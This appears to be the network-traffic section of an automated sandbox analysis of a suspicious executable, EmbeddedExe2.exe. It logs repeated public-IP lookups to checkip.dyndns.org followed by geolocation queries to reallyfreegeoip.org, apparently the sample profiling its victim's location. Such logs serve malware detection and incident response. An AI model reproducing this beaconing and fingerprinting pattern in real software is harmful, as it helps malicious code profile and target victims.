                                                                      Jan 10, 2025 16:46:55.386986017 CET49713443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:55.387003899 CET44349713104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:55.436814070 CET4971080192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:55.868957043 CET44349713104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:55.889314890 CET49713443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:55.889348030 CET44349713104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:56.002756119 CET44349713104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:56.002825975 CET44349713104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:56.002939939 CET49713443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:56.045156002 CET49713443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:56.087971926 CET4971080192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:56.088980913 CET4971480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:56.093513012 CET8049710193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:56.094003916 CET8049714193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:56.094096899 CET4971480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:56.094131947 CET4971080192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:56.097676039 CET4971480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:56.102530003 CET8049714193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:56.729125023 CET8049714193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:56.730670929 CET49720443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:56.730711937 CET44349720104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:56.731055975 CET49720443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:56.731055975 CET49720443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:56.731091022 CET44349720104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:56.780575037 CET4971480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:57.208010912 CET44349720104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:57.209739923 CET49720443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:57.209764957 CET44349720104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:57.362585068 CET44349720104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:57.362659931 CET44349720104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:57.362781048 CET49720443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:57.363349915 CET49720443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:57.366272926 CET4971480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:57.367508888 CET4972680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:57.371320009 CET8049714193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:57.371382952 CET4971480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:57.372371912 CET8049726193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:57.372445107 CET4972680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:57.372534037 CET4972680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:57.377280951 CET8049726193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:58.030265093 CET8049726193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:58.031609058 CET49729443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:58.031641006 CET44349729104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:58.031708002 CET49729443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:58.031919003 CET49729443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:58.031932116 CET44349729104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:58.077474117 CET4972680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:58.518474102 CET44349729104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:58.520600080 CET49729443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:58.520617962 CET44349729104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:58.651916027 CET44349729104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:58.651968956 CET44349729104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:58.652017117 CET49729443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:58.652508020 CET49729443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:58.665640116 CET4972680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:58.669459105 CET4973480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:58.670641899 CET8049726193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:58.670717955 CET4972680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:58.674428940 CET8049734193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:58.674515963 CET4973480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:58.674727917 CET4973480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:58.679532051 CET8049734193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:59.323669910 CET8049734193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:59.325273991 CET49740443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:59.325330973 CET44349740104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:59.325408936 CET49740443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:59.325767994 CET49740443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:59.325788975 CET44349740104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:59.385175943 CET4973480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:59.786303043 CET44349740104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:59.788407087 CET49740443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:59.788436890 CET44349740104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:59.948792934 CET44349740104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:59.948920012 CET44349740104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:59.949101925 CET49740443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:59.966289043 CET49740443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:59.978806019 CET4973480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:59.983918905 CET8049734193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:59.983992100 CET4973480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:59.987231970 CET4974680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:59.992110968 CET8049746193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:59.992197990 CET4974680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:00.004451990 CET4974680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:00.009385109 CET8049746193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:00.660883904 CET8049746193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:00.662205935 CET49752443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:00.662242889 CET44349752104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:00.662312984 CET49752443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:00.662617922 CET49752443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:00.662631035 CET44349752104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:00.702469110 CET4974680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:01.116662979 CET44349752104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:01.118474960 CET49752443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:01.118494987 CET44349752104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:01.281191111 CET44349752104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:01.281244040 CET44349752104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:01.281382084 CET49752443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:01.281939030 CET49752443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:01.285228014 CET4974680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:01.286385059 CET4975480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:01.290256977 CET8049746193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:01.291156054 CET8049754193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:01.291249990 CET4974680192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:01.291290998 CET4975480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:01.291397095 CET4975480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:01.296137094 CET8049754193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:01.953629971 CET8049754193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:01.955888987 CET49759443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:01.955977917 CET44349759104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:01.956114054 CET49759443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:01.956521988 CET49759443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:01.956554890 CET44349759104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:01.999344110 CET4975480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:02.440366983 CET44349759104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:02.473367929 CET49759443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:02.473448992 CET44349759104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:02.697408915 CET44349759104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:02.698098898 CET44349759104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:02.698178053 CET49759443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:02.698729038 CET49759443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:02.706990004 CET4975480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:02.708694935 CET4976580192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:02.712546110 CET8049754193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:02.712625980 CET4975480192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:02.714396954 CET8049765193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:02.714515924 CET4976580192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:02.714654922 CET4976580192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:02.719590902 CET8049765193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:03.354710102 CET8049765193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:47:03.356410980 CET49771443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:03.356432915 CET44349771104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:03.356785059 CET49771443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:03.356785059 CET49771443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:03.356812954 CET44349771104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:03.405607939 CET4976580192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:47:03.858937025 CET44349771104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:03.860903978 CET49771443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:03.860918045 CET44349771104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:03.973804951 CET44349771104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:03.973879099 CET44349771104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:47:03.973949909 CET49771443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:03.974421978 CET49771443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:47:04.525021076 CET4976580192.168.2.6193.122.6.168

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 10, 2025 16:46:53.369896889 CET5048353192.168.2.61.1.1.1
                                                                      Jan 10, 2025 16:46:53.376764059 CET53504831.1.1.1192.168.2.6
                                                                      Jan 10, 2025 16:46:54.377360106 CET5307853192.168.2.61.1.1.1
                                                                      Jan 10, 2025 16:46:54.385334969 CET53530781.1.1.1192.168.2.6

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jan 10, 2025 16:46:53.369896889 CET192.168.2.61.1.1.10xdfd3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:54.377360106 CET192.168.2.61.1.1.10x57bcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jan 10, 2025 16:46:53.376764059 CET1.1.1.1192.168.2.60xdfd3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:53.376764059 CET1.1.1.1192.168.2.60xdfd3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:53.376764059 CET1.1.1.1192.168.2.60xdfd3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:53.376764059 CET1.1.1.1192.168.2.60xdfd3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:53.376764059 CET1.1.1.1192.168.2.60xdfd3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:53.376764059 CET1.1.1.1192.168.2.60xdfd3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:54.385334969 CET1.1.1.1192.168.2.60x57bcNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:54.385334969 CET1.1.1.1192.168.2.60x57bcNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:54.385334969 CET1.1.1.1192.168.2.60x57bcNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:54.385334969 CET1.1.1.1192.168.2.60x57bcNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:54.385334969 CET1.1.1.1192.168.2.60x57bcNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:54.385334969 CET1.1.1.1192.168.2.60x57bcNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 16:46:54.385334969 CET1.1.1.1192.168.2.60x57bcNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • reallyfreegeoip.org
                                                                      • checkip.dyndns.org

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.649710193.122.6.168806968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 16:46:53.446540117 CET151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Jan 10, 2025 16:46:54.084300995 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:53 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                      Jan 10, 2025 16:46:54.092763901 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 16:46:54.278549910 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:54 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                      Jan 10, 2025 16:46:55.198730946 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 16:46:55.384382010 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:55 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.649714193.122.6.168806968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 16:46:56.097676039 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 16:46:56.729125023 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:56 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.649726193.122.6.168806968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 16:46:57.372534037 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 16:46:58.030265093 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:57 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.649734193.122.6.168806968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 16:46:58.674727917 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 16:46:59.323669910 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:59 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.649746193.122.6.168806968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 16:47:00.004451990 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 16:47:00.660883904 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:00 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.649754193.122.6.168806968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 16:47:01.291397095 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 16:47:01.953629971 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:01 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.649765193.122.6.168806968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 16:47:02.714654922 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 16:47:03.354710102 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:03 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.649711104.21.16.14436968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 15:46:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2025-01-10 15:46:55 UTC857INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:55 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838804
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7tiRBSHb8dzESGCjgyqQGTD85FPZ2mpYM34OrgftqCnibjmYCez4z%2FCAb%2BiJkI1RP6QVo2RcSC%2B%2B5ieMQr8pD5fyquDtNBnd4u9Oa3TVwTyZWowaqjsunzsf5pljbhTeHHAe5DP"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd765c9e1899-EWR
                                                                      alt-svc: h3=":443"; ma=86400
